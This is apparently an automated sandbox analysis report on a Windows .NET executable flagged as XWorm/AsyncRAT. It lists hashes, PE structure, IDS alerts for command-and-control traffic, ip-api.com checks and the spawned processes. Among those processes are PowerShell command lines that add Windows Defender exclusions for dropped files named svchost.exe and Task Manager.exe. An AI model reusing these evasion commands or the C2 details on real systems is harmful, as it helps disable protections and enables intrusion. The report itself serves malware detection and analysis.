                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.968205639552514
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:dLRcE11Dkl.exe
                                                                        File size:1'801'728 bytes
                                                                        MD5:68157ed3390faca2a327e25148f4bd97
                                                                        SHA1:d5fa29334ce471ceac94be49a39d9398b13c8505
                                                                        SHA256:7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab
                                                                        SHA512:2dd28552134896b7f77825904059df06a4582244cd937b9df8dd8b51b14e5eb5fe9dfe65d619e69504b73789aedca5971ce590740f7ac4bb68cc21b4b9eca751
                                                                        SSDEEP:24576:flroakFiyPRPC8oW++R7FaHFZnsxgT/x7hXh23wD4A12MgptxffEuBbJ4x+g3Ro9:f1kYyPRhfhaDZvXs3BptxffEuBbe6O6
                                                                        TLSH:D38568AB67E2523FDA44E8BB91C361D8DA55BCE197E83E30193C850A7142458BBC35FC
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E?g.................t..........n.... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x5b926e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x673F45ED [Thu Nov 21 14:38:37 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1b92180x53.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ba0000x4e6.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1bc0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x1b72740x1b740027ab9908cac47b8de1ed80ad95e4a07cFalse0.8985820112407513data7.969273400624172IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x1ba0000x4e60x600c87bb3af76797c469544436b38a861b4False0.380859375data3.7961052166947833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x1bc0000xc0x2005d8e27b7db48a4eba0cfd514f5e74d5cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0x1ba0a00x25cdata0.46688741721854304
                                                                        RT_MANIFEST0x1ba2fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-23T21:09:32.706821+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64999145.141.27.2487777TCP
                                                                        2024-11-23T21:09:33.285602+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649991TCP
                                                                        2024-11-23T21:09:33.354089+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64999145.141.27.2487777TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 21:07:05.368881941 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:05.488459110 CET8049707208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:05.489203930 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:05.493390083 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:05.613163948 CET8049707208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:06.239458084 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:06.359105110 CET8049710208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:06.359213114 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:06.395164013 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:06.514755964 CET8049710208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:06.585994959 CET8049707208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:06.640013933 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:07.548060894 CET8049710208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:07.593283892 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:10.253650904 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:10.380728006 CET8049712208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:10.380826950 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:10.381438971 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:10.501724958 CET8049712208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:11.570221901 CET8049712208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:11.625127077 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:54.411241055 CET8049712208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:54.411295891 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:56.243068933 CET8049710208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:56.243149996 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:07:56.904710054 CET8049707208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:07:56.904772997 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:08:46.596468925 CET4970780192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:08:46.912673950 CET8049707208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:08:47.576385975 CET4971080192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:08:47.858316898 CET8049710208.95.112.1192.168.2.6
                                                                        Nov 23, 2024 21:08:51.593763113 CET4971280192.168.2.6208.95.112.1
                                                                        Nov 23, 2024 21:08:51.713782072 CET8049712208.95.112.1192.168.2.6

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 21:07:05.146612883 CET5550653192.168.2.61.1.1.1
                                                                        Nov 23, 2024 21:07:05.284351110 CET53555061.1.1.1192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 21:07:05.146612883 CET192.168.2.61.1.1.10xf317Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 21:07:05.284351110 CET1.1.1.1192.168.2.60xf317No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649707208.95.112.1801020C:\Users\user\AppData\Roaming\svchost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 23, 2024 21:07:05.493390083 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Nov 23, 2024 21:07:06.585994959 CET175INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 20:07:05 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649710208.95.112.1806876C:\Users\user\AppData\Roaming\Task Manager.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 23, 2024 21:07:06.395164013 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Nov 23, 2024 21:07:07.548060894 CET175INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 20:07:06 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 59
                                                                        X-Rl: 43
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.649712208.95.112.1805492C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 23, 2024 21:07:10.381438971 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Nov 23, 2024 21:07:11.570221901 CET175INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 20:07:10 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 55
                                                                        X-Rl: 42
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:06:59
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\dLRcE11Dkl.exe"
                                                                        Imagebase:0x200000
                                                                        File size:1'801'728 bytes
                                                                        MD5 hash:68157ED3390FACA2A327E25148F4BD97
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:07:00
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\All function.cmd"
                                                                        Imagebase:0xb60000
                                                                        File size:1'714'688 bytes
                                                                        MD5 hash:FBD77E256063E3D225B8ECEC3BDBD6DB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 79%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:15:07:00
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0xa20000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:E9A629DD7B0ACCDA9D7696FC15135663
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 92%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:4
                                                                        Start time:15:07:01
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\Task Manager.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\Task Manager.exe"
                                                                        Imagebase:0x3b0000
                                                                        File size:67'072 bytes
                                                                        MD5 hash:C5ACDDD1F31EA152420CD0BEC24636BA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Task Manager.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 82%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:07:01
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\All function.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\All function.exe"
                                                                        Imagebase:0xa10000
                                                                        File size:1'429'504 bytes
                                                                        MD5 hash:7F9590397ABD938CFD86A9A7A6E51EF6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:15:07:05
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
                                                                        Imagebase:0x7ff771350000
                                                                        File size:14'620'672 bytes
                                                                        MD5 hash:D3565F59BBADCCEDED3D00831AF9B9E9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 62%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:15:07:05
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
                                                                        Imagebase:0xe10000
                                                                        File size:68'608 bytes
                                                                        MD5 hash:2B1BCFF698482A45A0D01356AD3E0384
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 96%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:15:07:06
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:15:07:06
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:15:07:06
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:15:07:06
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:15:07:11
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:15:07:11
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:15:07:28
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:15:07:28
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
